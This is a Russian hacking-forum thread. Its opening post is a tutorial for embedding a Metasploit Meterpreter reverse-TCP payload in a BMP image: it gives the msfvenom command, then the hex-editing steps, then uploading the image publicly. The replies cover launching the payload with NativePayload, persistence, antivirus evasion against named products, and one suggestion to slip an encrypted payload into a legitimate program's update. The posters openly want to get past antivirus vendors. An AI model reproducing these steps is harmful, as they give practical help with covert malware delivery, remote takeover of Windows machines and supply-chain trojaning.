Статья Злая КАРТИНКА Payload

Всем привет! сегодня я с Вами по делюсь техникой доставки пэйлода не обычным образом а именно через картинку!
Ибо решил я застолбить эту методику первым на русско-говорящем пространстве и кстати приятно читать свои статьи на ХАК-бордах))) Собсна хочу обратится к копиастерам увожаемые Вы хоть источник указывайте где взяли инструкции, а то люди у вас интересуются по подробностям ну, а Вы в свою очередь их игнорите так-как не знаете всех ньансов моих методик!
Приступим, нам понадобится фотошоп по желанию, программа paint эта утилита есть по умолчанию в винде! И великий и могучий "ДРАКОН" kali-linux в нем и сгенерим наш пэйлоад командой:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt

1.png


как видите у нас получился пэйлод размером 510 байт! Открываем его в текст. редакторе, убираем лишнее с помощью "найти и заменить"

2.png


3.png


4.png

Далее открываем Пайнт в винде и создаем файл .bmp 24-разрядный, размером: длинна 700 высота 2 в пикселях!

Screenshot_8.png



переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat
копируем наш сгенереный текст в hex-код картинки!

5.png


6.png

7.png

8.png

смотрим и видим что наша нагрузка успешно телепортировалась в картинку)) Далее я проявил креатив и позитиу, скрестил его в фотошопе с моей "иконой"

Screenshot_9.png

Screenshot_10.png

Screenshot_11.png

Screenshot_12.png


Screenshot_13.png


Следущее что я сделал загрузил свою "злую" картинку на какой то сервак)) то есть на общий доступ.

9.png


допишу как освобожксь... в хату ломится отдел "К")) Колян.. по кличке "сан-техник" Окрестили Мы его так потому что он в молодости ограбил склад с сантехникой, ох как мы тогда гуляли мммм..... как Боги)))

ПС Хочу передать горячий и пламенный привет, труженникам антивирусных компаний смотрите так ребятки, не за брызгайте желчью свои экраны!))))))

продолжение следует!
 
Последнее редактирование:
так то оно так , теперь осталась описать доставку "активатора" а тут способов много))))))))

a113 обещал написать к нему в личку стучите.
А потом с этим скриптом к "jaguar" он покрасит в зелёный...?!
 
и что? Это ничего не меняет, так как это один из пазлов атаки, а если быть точным заключительная часть .. Согласен?
бро ты это все из говядины готовишь?)
кстати обернул NativePayload в ps и стартанул картинку.
Мне кажется слишком много заморочек ради такого трюка загрузки шела. ИМХО все должно быть проще. когда у тебя бот простой как у школьника то и у он вызывает меньше подозрений т.к. им его в западло ковырять)
[doublepost=1499517052,1499516988][/doublepost]
А потом с этим скриптом к "jaguar" он покрасит в зелёный...?!
вот вы ему мозг засрали)))
 
бро ты это все из говядины готовишь?)
кстати обернул NativePayload в ps и стартанул картинку.
Мне кажется слишком много заморочек ради такого трюка загрузки шела. ИМХО все должно быть проще. когда у тебя бот простой как у школьника то и у он вызывает меньше подозрений т.к. им его в западло ковырять)
[doublepost=1499517052,1499516988][/doublepost]
вот вы ему мозг засрали)))
говядина!? неее, зачем? смысл ? когда и так в сети..) да заморочек много.. и NET framework не каждый подходит..

на счет мозга, да!)))))))
 
Последнее редактирование:
говядина!? неее, зачем? смысл ? когда и так в сети..) да заморочек много.. и NET framework не каждый подходит..

на счет мозга, да!)))))))
я не знаток NET framework и C# но если все перепелить под net 2.0 то помоему должно запустится на любой версии .NET
 
  • Нравится
Реакции: Da Vinci
А не то же ли это самое, как если бы мы просто сделали обычную программку, полезную, даже с открытым исходным кодом, распространили бы её под видом полезной программки, а потом бы просто вжарили закриптованый payload вместе с обновлением? А если и спалят, то отмазаться типо: "Та нас взломали и подсунули вирусяку. Вон даже LinuxMint так однажды ломали(сайт и подменяли пакеты)".
[doublepost=1499521190,1499520763][/doublepost]Только сейчас заметил в тегах "eval". Так что предлагаете, каким нибудь java исполнять этот код? Сделать Java-Drive-By чтобы загоняло в память из картинки?
 
Привет всем я запускаю сессия не открывается и какой порт должен быть открыт? продолжение будет???

lukb02ff.png
 
Привет всем. При использовнии NativePayload вылезает такая ошибка, подскажите в чём может быть дело. Использую kali 2017.1 64-bit. wine стоит 32-bit, NET.Framwork 4
 

Вложения

  • Снимок экрана от 2017-07-10 15-01-51.png
    Снимок экрана от 2017-07-10 15-01-51.png
    127,4 КБ · Просмотры: 597
  • Снимок экрана от 2017-07-10 15-01-31.png
    Снимок экрана от 2017-07-10 15-01-31.png
    84,6 КБ · Просмотры: 560
  • Снимок экрана от 2017-07-10 15-01-29.png
    Снимок экрана от 2017-07-10 15-01-29.png
    78,8 КБ · Просмотры: 515
  • Снимок экрана от 2017-07-10 15-01-08.png
    Снимок экрана от 2017-07-10 15-01-08.png
    96,6 КБ · Просмотры: 365
native очень капризная штука пытаюсь его наладить дабы потом мозг не выдурили
PS вайн стоит 32 не пройдет такой фокус
 
Последнее редактирование:
Глупый вопрос, наверное... Что бы meterpreter-у закрепиться в системе до обнаружения антивирусом, нужно мигрировать в процесс с автозагрузкой?
 
Глупый вопрос, наверное... Что бы meterpreter-у закрепиться в системе до обнаружения антивирусом, нужно мигрировать в процесс с автозагрузкой?
по желанию.. антивирусом не палится! можно настроить автоперсистенс.....
 
меня как раз на run persistence палит антивирус (в частности NOD), тем не менее отрабатывает. Но опять же, NOD орал каждые -i 60 при отстукивании на lhost.
 
  • Нравится
Реакции: Ondrik8 и Vertigo
Доброго всем времени суток.
На w7x86SP1+KES10.2.1.23 полет нормальный!!!
ЗЫ: компилил NativePayload_Image.exe в той же винде.
 
  • Нравится
Реакции: Ondrik8
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!